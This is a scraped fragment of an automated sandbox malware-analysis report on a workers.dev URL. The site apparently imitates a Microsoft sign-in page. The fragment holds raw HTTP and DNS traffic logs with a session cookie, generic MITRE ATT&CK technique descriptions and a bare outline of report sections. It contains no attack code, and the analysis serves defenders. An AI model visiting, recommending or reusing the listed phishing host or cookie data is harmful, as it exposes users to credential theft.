NID=513=ZRSg5KRo-RNSBhzCbMi1LPoRw9afq6SULUZmgydHdDPsYd6p-Fkb-Efg9kWv_mXgEtfkccXN2lZfDkg1kDP2X4nE1CMsMQ4EgmhSXXifj-b6BexBmuUlEMfbDLXGcpGSGAm0LF7dqJ06vkvvLTOVBel54q1-zjGwDdJJ65_xOPM
Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRRtT5aGJCvu7EGIjDMSzESXqZsVuec-K5gSL0dyPdiFMcnhBa2SK6Q33b-OjeLxfU0N_Vj-xNo_exqK2MyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-28-23; NID=513=ZRSg5KRo-RNSBhzCbMi1LPoRw9afq6SULUZmgydHdDPsYd6p-Fkb-Efg9kWv_mXgEtfkccXN2lZfDkg1kDP2X4nE1CMsMQ4EgmhSXXifj-b6BexBmuUlEMfbDLXGcpGSGAm0LF7dqJ06vkvvLTOVBel54q1-zjGwDdJJ65_xOPM
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=vkkYdLFfe5F6fPB&MD=dEo2Yeht HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: vbvfdvdjvv.fyfyvfytvghv.workers.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /style.css HTTP/1.1Host: vbvfdvdjvv.fyfyvfytvghv.workers.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://vbvfdvdjvv.fyfyvfytvghv.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /q/Screen-Shot-2022-01-30-at-10.27.21-PM.png HTTP/1.1Host: www.linkpicture.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vbvfdvdjvv.fyfyvfytvghv.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vbvfdvdjvv.fyfyvfytvghv.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vbvfdvdjvv.fyfyvfytvghv.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: vbvfdvdjvv.fyfyvfytvghv.workers.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vbvfdvdjvv.fyfyvfytvghv.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: vbvfdvdjvv.fyfyvfytvghv.workers.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: vbvfdvdjvv.fyfyvfytvghv.workers.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://vbvfdvdjvv.fyfyvfytvghv.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /style.css HTTP/1.1Host: vbvfdvdjvv.fyfyvfytvghv.workers.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://vbvfdvdjvv.fyfyvfytvghv.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /q/Screen-Shot-2022-01-30-at-10.27.21-PM.png HTTP/1.1Host: www.linkpicture.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vbvfdvdjvv.fyfyvfytvghv.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: vbvfdvdjvv.fyfyvfytvghv.workers.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vbvfdvdjvv.fyfyvfytvghv.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: vbvfdvdjvv.fyfyvfytvghv.workers.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=vkkYdLFfe5F6fPB&MD=dEo2Yeht HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: vbvfdvdjvv.fyfyvfytvghv.workers.dev
Source: global traffic	DNS traffic detected: DNS query: www.linkpicture.com
Source: global traffic	DNS traffic detected: DNS query: a.nel.cloudflare.com

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://vbvfdvdjvv.fyfyvfytvghv.workers.dev/

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

HTML

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 47

Chrome Cache Entry: 48

Chrome Cache Entry: 49

Chrome Cache Entry: 50

Chrome Cache Entry: 51

Chrome Cache Entry: 52

Chrome Cache Entry: 53

Chrome Cache Entry: 54

Chrome Cache Entry: 55

Chrome Cache Entry: 56

Static File Info

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: chrome.exePID: 6044, Parent PID: 3264

General

Windows Analysis Report
https://vbvfdvdjvv.fyfyvfytvghv.workers.dev/